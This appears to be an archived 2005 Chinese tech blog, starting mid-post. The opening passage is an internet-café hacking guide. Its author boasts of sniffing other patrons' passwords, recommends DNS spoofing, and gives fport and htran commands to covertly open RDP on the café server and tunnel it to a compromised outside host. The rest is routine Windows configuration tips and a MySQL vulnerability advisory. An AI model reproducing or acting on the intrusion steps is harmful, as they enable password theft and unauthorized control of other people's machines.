      192.168.1.1。如果你不喜欢着个,还有个密码监听器,密码监听器用于监听网页的密码,包括网页上的邮箱、论坛、聊天室等等。只需在一台电脑上运行,就可以监听局域网内任意一台电脑登录的账号和密码,并将密码显示、保存,或发送到用户指定的邮箱。我就经常有密码监听器2.4破解版在网吧监听别人

      密码!当然网吧最适合dns欺骗!
      如图3。
                  四.端口转发。
       
      为了能随时随地控制网吧机器,在家也可以!我们最好来个端口转发。首先我们可以用fport.exe(这个工具在angelshell1.0包里面有),格式为fport
            port>但是使用他可以不必安装后门,只需要普通的权限即可执行。网吧服务器一般是win2000server版的,我们趁管理员不注意,给他开3389。如果他的ip为192.168.0.1,我们就在他的命令行下执行fport.exe
      3389 myip
      9999,这里的myip可以是我们的一只有公网ip的肉鸡。我们再在公网ip的肉鸡上运行FportClient.exe着个是客户端。着样我们登陆公网ip的肉鸡的9999端口就进了网吧主机。在上面看第电影赶什么都行,不被发现就行了,我们动作轻点就行了。我们也可以给网吧主机装代理。就用htran2.4,SocksCap。在网吧主机命令行下上执行htran.exe
      -install (安装Socks5服务),htran.exe -start (启动Socks5服务),再执行"htran.exe -s
      -connect 共网肉鸡ip 3389。在自己的共网肉鸡上执行htran.exe -s -listen 3389
      5200(监听端口).现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了网吧主机。我们也可以
      用vidc来映射端口,这个和fport差不多就不多说了。

发布于 由 iver 有 0 篇评论
2005年8月13日 15:30
Windows 2003中如何安装和使用IE7.0
近日,外国的一位Rafael Rivera网友“发明”了一种方法,让我们在Windows 2003系统上可以应用全新的Internet Explorer 7.0 Beta 1。他删除了几个文件,即可让Windows 2003用上IE 7.0了。具体步骤如下:
  1.将IE7-WindowsXP-x86-enu.exe解压到一个临时文件夹。

  2.在解开的文件夹内删除以下内容:

  update\

  install.ins

  spmsg.dll

  spuninst.exe

  spupdsvc.exe

  3.在解开的文件夹内创建一个空白文本文件并命名为iexplore.exe.local。

4.现在我们已经得到一份独立版Internet Explorer 7 Beta 1了,把这个文件夹移动到任何你想要存放的地方。

  5.运行iexplore.exe。

  运行在windows server 2003 x64之上的IE 7 Beta 1

发布于 由 iver 有 0 篇评论
2005年8月13日 15:30
Windows XP SP2四则值得一用的技巧
Windows XP Service Pack 2发布以来,网上出现在很多技巧。本文将只为你推荐四种技巧。
  配置内存保护机制

  Microsoft在SP2中加入了新的内存保护功能――数据执行保护 (DEP)。有些软件可能会与这个功能发生冲突,这时你可以到“控制面板” “系统”中去关掉它,选择“高级”选项卡,在“性能”一节中单击“设置”按钮,进入“数据执行保护”选项卡,然后选择“为除下列选定程序之外的所有程序和服务启用DEP”并把冲突的程序加入其中即可。

  配置Windows防火墙

  在默认情况下,SP2会针对所有网络连接自动打开内置的Windows防火墙。如果你在安装了SP2之后遇到数据交换方面的麻烦,就需要检查一下防火墙的设置情况。在“控制面板”中双击“Windows防火墙”图标就能进入Windows防火墙设置设置选项。在“例外”选项卡中,你可以允许“文件和打印共享”服务或者打开某个特定的TCP或UDP端口。让“安全中心”闭嘴

  “安全中心”经常会冒出一些让人厌烦的提示信息,这通常是由于它认为你的“自动更新”、防火墙或是防病毒软件没有正确配置。修改注册表当然是让“安全中心”闭嘴的一种办法,但更简单的办法是在“安全中心”的“资源”选项卡中单击“更改‘安全中心’通知我的方式”,然后取消选择所有警报设置项目即可。

  彻底关闭“安全中心”

  “安全中心”可能是SP2中最显而易见的一个新功能,它会监视你的防病毒软件、防火墙以及自动更新功能,这对于初学者来说是比较有用的,而有经验的用户完全可以自行管理那些功能。依次单击“开始”“运行”输入“services.msc”并按回车键,找到Security Center服务,右键单击它并选择“属性”,然后把它的启动类型改为“已禁用”。你也可以在命令行方式下输入下面的命令“sc config wscsvc start= disabled”,注意:在等号后面必须加一个空格。

发布于 由 iver 有 0 篇评论
2005年8月13日 15:30
两招实用远程控制技巧

在网络规模日益扩大的今天,如果还沿用以前对单机分别管理的模式,肯定是不现实的!为了有效提高网络的管理和维护效率,不少网络管理人员都选用了远程控制模式,来对局域网或服务器进行随时随地的管理!不过当你选用pcAnyWhere远程控制软件或者通过远程桌面连接功能,来对服务器进行远程管理时,往往会给非法攻击者的远程入侵带来便利!那么我们能否做到,既可以对服务器或局域网进行远程控制,又可以阻止黑客趁机而入呢?答案是肯定的!这不,本文下面为大家推荐的一些远程控制方法,突破常规远程控制模式,能够帮助大家更高效、更安全地管理好服务器或局域网!



  1、借助MMC控制台实现远程控制

  尽管通过远程桌面功能或pcAnyWhere之类的常规控制软件,能够对服务器进行远程管理,但不可否认的是,这些控制方式存在着明显的安全漏洞,而且很容易被非法攻击者利用。而借助MMC控制台的计算机管理功能,不但可以有效地管理好本地或远程的服务器,而且这种方式有效避开了远程桌面连接所带来的明显安全漏洞,因此借助MMC系统控制台,不但很方便地对服务器进行远程管理,而且还会阻止黑客对服务器进行恶意攻击。

当然在使用MMC控制台对服务器进行远程管理时,必须先获得服务器的超级管理权限,然后还需要安装好相应的MMC插件和一定的管理工具才可以;例如要想对Windows Server 2003服务器进行远程控制的话,必须先获得管理Windows 2003服务器的服务权限,同时还需要在本地计算机中安装好MMC插件和Windows 2003服务器的相关管理工具。一旦满足了上述条件,你就可以按照如下步骤来对服务器进行远程控制了:

  依次单击“开始”/“运行”命令,打开系统运行对话框,在其中输入字符串命令“mmc”,单击“确定”按钮后,打开系统的MMC控制台窗口,如图1所示;



依次单击MMC控制台窗口菜单栏中的“文件”/“添加/删除管理单元”命令,在其后出现的设置窗口中,单击“独立”标签,并在对应的标签页面中,继续单击“添加”按钮,打开如图2所示的“添加独立管理单元”设置窗口;




图2

  选中该设置窗口中的“计算机管理”选项,再单击对应窗口中的“添加”按钮,在随后弹出的如图3所示的对话框中,将“另一台计算机”选项选中,同时输入需要进行远程控制的服务器IP地址,再单击“完成”按钮退出“计算机管理”设置窗口;


图3

  返回到MMC控制台窗口,用鼠标双击刚刚添加好的管理单元,以后你就能想管理本地工作站一样,对服务器进行远程控制和管理了。不过当你在对远程服务器进行管理时,系统屏幕上出现“没有访问远程计算机的权限”或者“拒绝访问”的错误提示时,就表明你还没有获得远程管理服务器的权限。此时,你不妨在控制台窗口中依次单击“文件”/“保存”菜单命令,在随后出现的文件保存对话框中,将当前控制台另存为“远程管理服务器”,并退出MMC控制台界面。

  接着依次单击“开始”/“程序”/“管理工具”选项,在其后出现的下级菜单中右击刚才保存好的“远程管理服务器”项目(如图4所示),并执行快捷菜单中的“运行方式”命令,在随后弹出的“运行身份”设置框中,输入有权管理远程服务器的用户名及密码,如图5所示。然后重新执行MMC命令,打开MMC控制台窗口,就能对目标服务器进行远程管理了。值得注意的是,倘若本地计算机和目标服务器不属于Active Directory成员的话,即使你在“运行身份”设置框中正确输入了目标服务器的超级管理员帐号,本地计算机也需要创建一个相同的超级管理员帐号。


图4


图5

  小提示:如果本地计算机和远程服务器安装的是两种不同操作系统时,那么你就必须先在本地计算机中安装好与远程服务器相对应的MMC管理插件。例如,要是本地计算机中使用的是Windows 2000服务器系统,而远程服务器使用的是Windows 2003服务器系统,那你就必须在本地计算机中先安装好Windows 2003服务器的相关管理工具,具体安装方法为:

  首先将Windows 2003服务器系统的安装光盘放入到光驱中,打开其中的“i386”文件夹窗口,双击该窗口中的“adminpak.msi”文件图标,随后屏幕上将弹出Windows 2003服务器的管理工具安装向导窗口;

  按照屏幕向导提示完成好安装任务后,再打开MMC管理控制台,将Windows 2003服务器有关的管理工具全部加入其中,再将此保存好,以后就能按照上面的方法对Windows 2003服务器进行远程控制和管理了。

2、通过命令行实现远程控制



  无论是远程桌面连接还是MMC控制台,其实都是通过图形用户接口来实现远程控制目的的,这些方式都有一个致命的缺憾,那就是在进行远程控制操作时都需要耗用服务器的太多系统资源,而且对一些复杂的远程控制操作还无法完成。为此,不少人都不约而同地想到了Telnet命令控制方式,不过该方式的明码传输特点,很容易给服务器的安全带来致命的威胁!那么有没有一种办法,既可以通过命令行方式来对服务器进行远程管理,又能确保远程控制过程中服务器避免被恶意攻击呢?其实,借助一款名为“F-Secure SSH server”的工具,你可以轻松实现上述控制要求;下面就是使用“F-Secure SSH server”工具,安全地对服务器进行远程控制的具体设置步骤:

  首先在被控制的服务器中安装好“F-Secure SSH server”服务器端程序,安装成功后服务器在缺省状态下将会自动启用SSH Server服务,客户端借助该服务就能对服务器进行命令控制了;

  为了保证对服务器的安全控制,你还需要对SSH Server服务的相关参数进行一下合适设置,以阻止黑客趁机入侵服务器。考虑到SSH Server服务在默认状态下,会打开服务器中的“22”端口;为了避免黑客通过该端口对服务器实施非法攻击,你可以将SSH Server服务所用的端口号码修改成其他的陌生号码。在修改端口号码时,需要先依次单击“开始”/“程序”/“F-Secure SSH Server”/“Configuration”命令,打开如图6所示的“F-Secure SSH Server Configuration”窗口,再单击“Server Setting”项目下面的“Network” 命令,在其后窗口的“Port”设置项处,输入新的端口号码,例如“4567”(如图7所示),再单击一下“Apply”按钮就可以了。


图6




为了进一步保护服务器的安全,你还可以设置SSH Server服务,只允许通过特定的工作站来远程管理服务器,而不允许其他工作站随意访问服务器。在进行该项安全设置时,你同样需要先打开“F-Secure SSH Server Configuration”窗口,再单击“Server Setting”菜单下面的“Host Restrictions”命令,在图8界面的“Deny login from hosts”设置项处,你可以输入不允许访问服务器的工作站IP地址,例如要是输入“10.168.160.26”,再单击“Apply”按钮后,那么任何用户在IP地址为“10.168.160.26”的工作站,都无法对服务器进行远程控制。




图8

  此外在缺省状态下,SSH Server服务允许用户同时和远程服务器建立多个连接,但多个远程连接不但会耗用太多的系统资源,而且还容易给服务器带来安全隐患,因此你有必要设置一下SSH Server服务,让其远程连接数目限制在一个合适的范围之内。在限制连接数目时,必须先打开“F-Secure SSH Server Configuration”配置界面,再单击“Server Setting”菜单项下面的“General”命令,在其后界面的“Maximum Number of Connections”处输入合适的数值,例如输入数字“10”(如图9所示),再单击“Apply”按钮的话,那么服务器可以同时接受10个远程连接,要是输入数字“0”的话,服务器对远程连接数目将不作限制。


图9

  做好了上面的各项安全设置后,下面你只要在指定工作站中安装好“F-Secure SSH Client”客户端程序,并打开“F-Secure SSH Client”程序界面,单击其中的“Connect”按钮,在其后打开的“Connect to remote host”设置框中,将远程服务器的IP地址填写在“Host name or IP address”处,再在“User Name”处正确填写好登录服务器的帐号名,并且在“Port”处输入SSH Server服务使开启的服务器端口号码,最后单击“Connect”按钮,要不了多长时间你就能登录进入远程服务器,以后你就能通过命令行方式,来对远程服务器进行安全控制和管理了。




发布于 由 iver 有 0 篇评论
2005年8月13日 15:29
教你一招:Windows关机重启只在一秒瞬间
1.关机/重启只要1秒钟
  Windows 2000/XP关机速度慢一直是不少用户的隐痛,因此有人摸索出了下面这个“非正常”的技巧。

  如果想让Windows 2000以瞬间的速度重启,那么可以按下Ctrl+Alt+Del组合键,接着在点击“关机”按钮的同时按住Ctrl,这时系统会弹出警告提示:“如果继续,您的机器会重新启动,未保存的数据将丢失,如非绝对必要,请勿采取此步骤”,点击“确定”,那么Windows 2000将会瞬间重启,并不会显示关机画面。

  对于Windows XP,则可以在按下Ctrl+Alt+Del后,在弹出的“任务管理器”中点击“关机→关机”,与此同时按Ctrl,不到1秒钟你会发现系统已经关闭了,简直就在眨眼之间,同样道理,如果在“关机”菜单中选择“重启”,即可快速重启。

  2.Super Fast Shutdown令关机、重启超级快

  上面的技巧总感觉有些不太美妙,有可能会造成数据丢失或其他问题,因此建议你选择Super Fast Shutdown这款免费软件。安装后它会在桌面和快速启动栏生成关机和重启的快捷方式,只要按下相应的快捷方式,就能在瞬间关机或重启。不过要注意的是,有些电脑在关机后,会出现“现在可以安全地关机了”的画面,还需要按下机箱上的电源按钮来彻底关闭。该软件下载地址为:http://www.xp-smoker.com/installations/superfast.zip。

小提示

  建议在按下相应快捷方式前,将所有打开的程序关闭掉,以免出现数据丢失的问题。

发布于 由 iver 有 0 篇评论
2005年8月13日 15:28
手把手教你正确设置虚拟内存
最近大家都经常谈论的话题,就是DDR内存的大降价,DDR266从400多元的位置暴跌到200元左右,很多人都用上了512MB甚至1GB的内存,于是有一种观点也在部分玩家中流行起来,说是禁用虚拟内存、禁止Windows页面文件交换、强行命令数据在内存中处理,可以加快数据读写效率,是不是真的这样呢?

  根据应用需要设置

  首先,要搞清楚什么是“大内存”配置。当初设计Windows使用虚拟内存本身是因为物理内存很贵,一般都不会超过128MB容量,需要硬盘空间作临时缓冲――也就是说,你应该把应用时需要多少物理内存和自己实际拥有的内存作一个比较,如果实际拥有的内存少于应用峰值,就会遇到麻烦了。

  一般来说,如果要进行平面大图、3D动画渲染等数据量很大的任务,不应禁用虚拟内存;如果经常要打印带大量图片的文档,禁止虚拟内存也会让程序出现错误。因为像Word一类软件打印之前要生成缓冲文件,再传输到打印机上,图片尺寸较大、分辨率较高时,需要的缓冲区容量也很大,笔者以前帮助广告美工出设计图时,就遇到打印一张图生成将近300MB临时文件的情况。因为Windows和应用程序本身也是需要一定内存来运行的,如果你是512MB的配置,禁用了虚拟内存,很有可能中途报告虚拟内存不足,强行退出造成打印纸张及油墨的浪费。

  所以,必须根据你的任务应用环境,来决定是否禁用虚拟内存。即使是把虚拟内存大小固定设置,也必须谨慎,否则在运行大型应用软件的时候才出现虚拟内存不足的提示,整个系统会因为CPU的占用率极高而变得很慢,此时再改动就没那么方便了。
考虑操作系统的因素

  在不同的操作系统下,虚拟内存的设置或禁用也是不同的,不能一概而论。

  因为架构问题,Windows 9x/Me对大于256MB的内存有先天的不足,大于这个数量的内存,Windows 98会出现不稳定及启动速度变慢的情况。如果使用了大内存加上禁用虚拟内存,不稳定的因素将会进一步增加。Windows 2000/XP可有效管理的内存容量为1GB左右,大于这个数目也会出现不稳定的情况,而且视主板BIOS型号及芯片组性能而不同。

  另外,Windows本身的设计就是,一旦发现有进程转入不活跃状态,就会把分配给它的内存空间映射到交换文件中,尽可能空出物理内存给其它活动的线程,并不是用完物理内存才开始动用交换文件。因为如果等到物理内存用完再调用,就已经太迟了,在配置较低的机器上势必造成数据传输和处理停滞。所以禁止虚拟内存从原则上来讲,最容易引起Windows异常,即使不出现运行不了的故障,也会频繁地提示虚拟内存不够,请重新设置云云,让你不胜其烦。

  如何禁用虚拟内存

  对于拥有很大容量内存的朋友,如果真想禁用虚拟内存加快运行速度,其实可以用折中的办法“骗”过Windows,就是把物理内存划出一部分来虚拟成物理硬盘:

  1.Windows 98

  可以在Config.sys里加入一句:

  DEVICE=C:\WINDOWS\RAMDRIVE.SYS 23000 /E(请根据自己的Windows所在分区适当设置)

  这句话就是利用内存由Ramdrive.sys虚拟出一个分区,其中23000是你希望使用多少物理内存,单位是KB,如果你有1GB,可以把这个数字设到300000到500000左右,即300~500MB,然后把虚拟内存设置到该虚拟出的分区上,程序就完全在物理内存中运行了。

  2.Windows 2000/XP

  必须依靠第三方的工具软件来虚拟物理硬盘,然后再把Pagefile.sys页面文件设到该虚拟盘上,实现同样效果;或者可在System.ini中的“[386enh]”底部加入一句,ConservativeSwapfileUsage=1,让Windows优先使用物理内存,尽量不要强行直接禁用虚拟内存交换文件。

  结论

  笔者认为,禁用虚拟内存达到的加速效果很有限,加上一般Windows的默认设置比较适当,尤其是Windows 2000/XP默认设置对虚拟内存的管理很好,尽量不要随意更改,否则出了问题你很难判断和分析。

  题外话:有关内存的一些故障分析

  有时,Windows出现一些和内存有关的故障提示,不一定是和内存有关;而一些看似和内存无关的故障,却真是内存引起的,很有隐蔽性。

  比如:你用PQ分区大师之类的工具改过分区簇的大小,当簇小于默认值时,Windows 98运行磁盘扫描就可能会报内存不足,而在Windows 2000和Windows XP下则正常――也就是说,这跟内存根本没关系。

  再比如:有时开机进入Windows时,系统会提示你注册表错误,是否恢复,当你选恢复后,再次重启,还是同一个提示,这种故障,却多半是内存条或散热方面出了问题引起的,需要更换内存或是风扇了。

  所以,Windows的提示有时会误导用户,如果反复出现同一种故障,按其提示解决不了,应考虑Windows误报的可能性。
发布于 由 iver 有 0 篇评论
2005年8月13日 15:25
安全删除Windows XP SP2的四种方法
 
WindowsXP ServicePack2的发布引来无数人的关注,许多人也迫不及待的下载安装,然而SP2的众多新功能和许多改进也许并不会和你机器中原有的硬件或者应用程序很好的兼容,相信这也为许多人带来了麻烦。如果为此重装系统那真是得不偿失。许多人一定很关心如何能在保证系统正常运行的情况下卸载SP2。  
  使用控制面板中的“添加或删除程序”工具


  1. 单击“开始”,单击“运行”,在“打开”框中键入 appwiz.cpl,然后单击“确定”。  


  2. 单击选中“显示更新”复选框。  


  3. 单击“Windows XP Service Pack 2”,然后单击“删除”。  


  4. 按照屏幕上的说明操作,以删除 Windows XP SP2。  


  使用隐藏的 $NtServicePackUninstall$ 文件夹


  1. 单击“启动”,单击“运行”,在“打开”框中键入c:windows$NtServicePackUninstall$spuninstspuninst.exe,然后单击“确定”。  


  2. Windows XP Service Pack 2 删除向导启动之后,单击“下一步”。  


  3. 按照屏幕上的说明操作,以删除 Windows XP SP2。  


  使用系统恢复过程


  1. 单击“开始”,单击“运行”,在“打开”框中键入 %SystemRoot%System32restorerstrui.exe,然后单击“确定”。  


  2. 单击“恢复我的计算机到一个较早的时间”,然后单击“下一步”。  


  3. 单击选中安装 Windows XP SP2 时的日期,然后单击“还原点”框中的“Installed Window XP Service Pack 2”。  


  4. 单击“下一步”,然后按照屏幕上的说明操作,以删除 Windows XP SP2。
使用故障恢复控制台

  如果您尝试了上述所有方法,仍然无法成功地删除 Windows XP SP2,请按照下列步骤操作: 1. 将 Windows XP 启动盘插入软盘驱动器,或将 Windows XP CD-ROM 插入 CD-ROM 或 DVD-ROM 驱动器,然后重新启动计算机。当屏幕上出现以下消息时,按任意键,从 Windows XP CD 启动计算机:按任意键从光盘引导

  注意:您的计算机必须被配置为从 CD 驱动器或 DVD 驱动器启动。有关如何将计算机配置为从 CD 驱动器或 DVD 驱动器启动的更多信息,请参见计算机附带的文档,或与计算机制造商联系。  


  2. 当屏幕上出现以下消息时,请按 R 键,启动故障恢复控制台: 欢迎使用安装程序  


  3. 选择您的 Windows XP 安装。此安装通常位于 C:Windows 目录下。  


  4. 根据提示键入管理员密码。如果您没有管理员密码,请按 Enter 键。  


  5. 在命令提示符处,键入 cd $ntservicepackuninstall$spuninst,然后按 Enter 键。  


  6. 警告:当您完成这一步骤后,您将无法终止删除过程。  


  在命令提示符下,键入 batch spuninst.txt,然后按 Enter 键。


  7. 删除过程结束后,键入 exit,然后按 Enter 键。  


  8. 重新启动计算机。


  重要说明:计算机重新启动后,Windows Explorer (Explorer.exe) 不会运行,您必须按照下列步骤操作:  


  a. 按 Ctrl+Alt+Delete 启动任务管理器。  


  b. 单击“应用程序”选项卡,然后单击“新任务”。  


  c. 在“打开”框中,键入 regedit,然后单击“确定”。  


  d. 找到下面的注册表子项并单击它:


  HKEY_LOCAL_MACHINESystemCurrentControlSetServicesRpcSs  


  e. 右键单击“ObjectName”,单击“修改”,然后在“数值数据”框中键入 LocalSystem。  


  f. 重新启动计算机  


  9. 使用上面的某种方法从计算机上删除 Windows XP SP2。

发布于 由 iver 有 0 篇评论
2005年8月13日 15:25
64位Windows XP操作系统为何如此肥胖
最近,有朋友询问在安装了64位的Windows XP后,还没安装任何应用程序,但系统盘的空间占用竟达3.0GB以上(该系统安装在C盘)。这是为什么?怎样解决?
  问题原因:一打听才知道,该朋友的内存容量为1GB,看来问题就出在这里。自Windows 2000以后,Windows系统采用了页面文件(在Windows 98下叫“虚拟内存”)来提高系统性能。它将一部分硬盘空间设置为虚拟内存,从而扩大了计算机的可用“内存”空间来满足程序运行的要求。页面文件默认位于系统分区的根目录下,文件名为pagefile.sys ,具有隐藏属性,这个文件的大小至少是物理内存的1.5倍。也就是说,仅这个文件就将占用你系统盘1.5GB以上的空间。
  解决方法:既然知道了问题出在pagefile.sys文件上,就开始着手来解决。但它是不能被手动删除的,只能将它移动到其他分区中。右击“My computer(我的电脑)→Properties(属性)→Advanced(高级)”。在打开的对话框中单击“Performance(性能)”下的“Setting(设置)”,再在打开的对话框中单击“Advanced(高级)”,接着单击“Virtual Memory(虚拟内存)”,就能看到虚拟内存设置界面了。首先,在设置窗口中选中C盘,再选中“Custom Size”,然后在“Initial Size”和“Maximum Size”后都输入数字“0”。最后单击一下“Set”以使修改生效。接着选中D盘,再选中“Custom Size”,然后在“Initial Size”和“Maximum Size”后都输入一个适当的值。最后单击一下“Set”。一般来说,“Initial Size”和“Maximum Size”后应输入相等的值,且都为物理内存的1.5倍左右。

  重新启动电脑后,pagefile.sys文件就移动到D盘了,可在D盘根目录下找到它。同时,C盘下的同名文件会自动消失。至此,C盘的空间占用恢复到了1.5GB左右。

  比比有话说:另外,如果启用了系统休眠功能,它将在C盘生成名为“hiberfil”的文件,该文件的大小等于物理内存,它也是占用硬盘空间的大户。如果没有启用休眠功能自然就不存在这一问题。

发布于 由 iver 有 0 篇评论
2005年8月13日 15:23
重装Windows系统不可忽视的几个小技巧
我碰到好多朋友,或者是亲戚,网友,自己的电脑一碰到问题就随意找人借一张系统安装光盘自己重装系统了,但随之而来的问题也就来了,下面我略举一二和安装系统的注意事项:
  1,显卡驱动:安装好显卡驱动后没调整显示器的刷新率,使得 显示器工作在默认刷新率60HZ。 长时间使用会使人头晕,眼睛酸 涨,视力下降等・・所以,请在安装好显卡驱动后别忘记调整一 下显示器的刷新率,一般15寸CRT调整为800X600 75~85HZ,17寸CRT为1024X768 75~85HZ,当显示器调整到75HZ以上时,眼睛几乎察觉不到显示 器在闪烁。

  不过请不要随意把显示器的刷新率调整到85HZ以上, 如果你的显示器性能一般的话,很容易烧毁显象管。所以,在最 好再安装一下显示器驱动。

  如果是LCD显示器,则不要超过75HZ ,因为LCD和CRT的呈像方式不同,CRT是不段刷新画面来使得显 示器呈像的,而LCD只要改变发光颗粒就能使显示器中的画面动 起来,所以刷新率的高低对LCD显示器无任何影响,也不会让人 产生疲劳。

  2,声卡驱动:现在很多电脑都使用AC97规范的集成声卡。但有 些主板的驱动做的不够到位,需要用户自己手动安装声卡驱动。 很多朋友在光盘中分不清楚自己该安装哪个,可以・・右击我的 电脑―属性―硬件―设备管理器―声音,视频和游戏设备,选择 更新驱动―从列表或指定范围,选择的范围是光驱:再指定光盘 中的dirver―sound文件夹就可以了,这样比自动搜索驱动安装 的成功率和正确性要高。

3,检查电脑的硬件驱动是否全部安装,或是否正确安装,可以 ・・・・右击我的电脑―属性―硬件―设备管理器,看一下电脑 的各项硬件是否全部安装到位,如果设备有问题的话,那该设备 前会有一个黄色的问号或惊叹号。

  4,操作系统和硬件驱动安装后请不要立即让电脑连接到网络! !,FTTB用户在重新安装系统时最好能拔掉FTTB线!因为FTTB不需要用拨号软件就能让电脑自动连接到网络中,这样会使得刚新 装好的系统再次感染到病毒!这样重装好的系统就前功尽弃了!

发布于 由 iver 有 0 篇评论
2005年8月13日 15:22
装好Windows系统后必须做的10件大事
 
Windows系统是越用越慢,这是不争的事实。因此,使用Windows就免不了要重新安装系统。当然,重新安装系统并不难,但是安装完系统后你知道我们有多少事情必须要做吗?这可容不得丝毫的松懈,一旦马虎,将可能会导致前功尽弃,甚至有可能会造成数据丢失、信息泄密!

  第1件大事:不要急着接入网络

  在安装完成Windows后,不要立即把服务器接入网络,因为这时的服务器还没有打上各种补丁,存在各种漏洞,非常容易感染病毒和被入侵。 此时要加上冲击波和震撼波补丁后并重新启动再联入互联网。

  第2件大事:给系统打补丁/安装杀毒软件

  不用多说,冲击波和震荡波病毒的补丁是一定要打上的,如果你安装了Windows XP SP2则不用再另行安装。

  Windows XP冲击波(Blaster)病毒补丁

安装完系统后,一定要安装反病毒软件,同时将其更新到最新版本。

  第3件大事:关闭系统还原

  系统还原是Windows ME和Windows XP、Windows 2003中具有的功能,它允许我们将系统恢复到某一时间状态,从而可以避免我们重新安装操作系统。不过,有的人在执行系统还原后,发现除C盘外,其它的D盘、E盘都恢复到先前的状态了,结果里面保存的文件都没有了,造成了严重的损失!

  这是由于系统还原默认是针对硬盘上所有分区而言的,这样一旦进行了系统还原操作,那么所有分区的数据都会恢复。因此,我们必须按下Win+Break键,然后单击“系统还原”标签,取消“在所有驱动器上关闭系统还原”选项,然后选中D盘,单击“设置”按钮,在打开的窗口中选中“关闭这个驱动器上的系统还原”选项。

  依次将其他的盘上的系统还原关闭即可。这样,一旦系统不稳定,可以利用系统还原工具还原C盘上的系统,但同时其他盘上的文件都不会有事。

  第4件大事:给Administrator打上密码

  可能有的人使用的是网上下载的万能Ghost版来安装的系统,也可能是使用的是Windows XP无人值守安装光盘安装的系统,利用这些方法安装时极有可能没有让你指定Administrator密码,或者Administrator的密码是默认的123456或干脆为空。这样的密码是相当危险的,因此,在安装完系统后,请右击“我的电脑”,选择“管理”,再选择左侧的“计算机管理(本地)→系统工具→本地用户和组→用户”,选中右侧窗口中的Administrator,右击,选择“设置密码”。

  在打开窗口中单击“继续”按钮,即可在打开窗口中为Administrator设置密码。

  另外,选择“新用户”,设置好用户名和密码,再双击新建用户,单击“隶属于”标签,将其中所有组(如果有)都选中,单击下方的“删除”按钮。再单击“添加”按钮,然后再在打开窗口中单击“高级”按钮,接着单击“立即查找”按钮,找到PowerUser或User组,单击“确定”两次,将此用户添加PowerUser或User组。注销当前用户,再以新用户登录可以发现系统快很多。

第5件大事:关闭默认共享

  Windows安装后,会创建一些隐藏共享,主要用于管理员远程登录时管理系统时使用,但对于个人用户来说,这个很少用到,也不是很安全。所以,我们有必要要切断这个共享:先在d:\下新建一个disshare.bat文件,在其中写上如下语句:

  @echo off

  net share C$/del

  net share d$/del

  netshare ipc$/del

  net share admin$ /del

  接下来,将d:\disshare.bat拷贝到C:\WINDOWS\System32\GroupPolicy\User\Scripts\Logon文件夹下。然后按下Win+R,输入gpedit.msc,在打开窗口中依次展开“用户配置→Windows设置→脚本(登录/注销)”文件夹,在右侧窗格中双击“登录”项,在弹出的窗口中,单击“添加”命令,选中C:\WINDOWS\System32\GroupPolicy\User\Scripts\Logon文件夹下的disshare.bat文件。

  完成上述设置后,重新启动系统,就能自动切断Windows XP的默认共享通道了,如果你有更多硬盘,请在net share d$/del下自行添加,如net share e$/del、net share f$/del等。

  第6件大事:启用DMA传输模式

  启用DMA模式之后,计算机周边设备(主要指硬盘)即可直接与内存交换数据,这样能加快硬盘读写速度,提高数据传输速率:打开“设备管理器”,其中“IDE ATA/ATAPI 控制器”下有“主要 IDE 通道”和“次要 IDE 通道”,双击之,单击“高级设置”,该对话框会列出目前IDE接口所连接设备的传输模式,单击列表按钮将“传输模式”设置为“DMA(若可用)”。重新启动计算机即可生效。

  第7件大事:启用高级电源管理

  有时候安装Windows XP之前会发现没有打开BIOS电源中的高级电源控制,安装Windows XP后,关闭Windows时,电源不会自动断开。这时,很多人选择了重新打开BIOS中的高级电源控制,并重新安装Windows XP。事实上,用不着这么麻烦,只要大家确认已经在BIOS中打开高级电源控制选项,再从http://www.yaguo.com/~mig25/acpi.exe下载并安装这个程序,同时选择ACPI Pc,一定不要选错,否则重启后可能无法进入Windows),并重新启动电脑,电脑可能会重新搜索并自动重新安装电脑的硬件,之后就可以使其支持高级电源控制了。

  第8件大事:取消压缩文件夹支持

  单击开始→运行,输入“regsvr32 /u zipfldr.dll”回车,出现提示窗口“zipfldr.dll中的Dll UnrgisterServer成功”即可取消Windows XP的压缩文件夹支持。另外,输入regsvr32 shdocvw.dll可以取消“图片和传真”与图片文件的关联。

  第9件大事:取消“磁盘空间不足”通知

  当磁盘驱动器的容量少于200MB时Windows XP便会发出“磁盘空间不足”的通知,非常烦人。可以打开“注册表编辑器”,定位到HKEY_CURRENT_USER\Software\Mi crosoft\Windows\CurrentVersion\Policies \Explorer,在“Explorer”上单击右键,选择右键菜单上的“新建”→“DWORD 值”,将这个值命名为“NoLowDiskSpaceChecks”,双击该值将其中的“数值数据”设为“1”。

  第10件大事:启用验证码

  安装SP2后,大多数用户发现在访问某些需要填写验证码的地方,都无法显示验证码图片(显示为一个红色小叉),这是一个非常严重的Bug。解决办法为:运行“Regedit”命令打开注册表编辑器,依次定位到“[HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ Security]”,在窗口右边新建一个名为“BlockXBM”的REG_ DWORD值,将其值设置为“0”(十六进制值)。

发布于 由 iver 有 0 篇评论
2005年8月13日 15:20
MySQL用户定义函数不正确过滤目录遍历字符漏洞
 
MySQL用户定义函数不正确过滤目录遍历字符漏洞

发布日期:2005-08-13
更新日期:2005-08-13

受影响系统:
MySQL AB MySQL 5.0.XX
MySQL AB MySQL 4.1.XX
MySQL AB MySQL 4.0.XX
不受影响系统:
MySQL AB MySQL 5.0.7-beta
MySQL AB MySQL 4.1.13
MySQL AB MySQL 4.0.25
描述:
--------------------------------------------------------------------------------
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

MySQL在处理用户自定义函数的请求时存在漏洞,攻击者可以利用这个漏洞远程执行任意代码。但应注意这个漏洞仅影响Windows平台,其他操作系统不受影响。

MySQL的UDF创建函数试图过滤掉目录遍历字符,将对函数库的访问仅限于系统和MySQL目录中。但MySQL仅将正斜线(/)用作路径分隔符,而Windows机器使用反斜线(\)分隔路径中的目录,这就允许攻击者绕过目录遍历检查,包含任意文件。



        Team SHATTER (shatter@appsecinc.com)
 
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112360618320729&w=2
*>

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 限制创建用户定义函数。

厂商补丁:

MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://dev.mysql.com/downloads/
发布于 由 iver 有 0 篇评论
2005年8月13日 15:19
MySQL用户定义函数多个安全漏洞
 
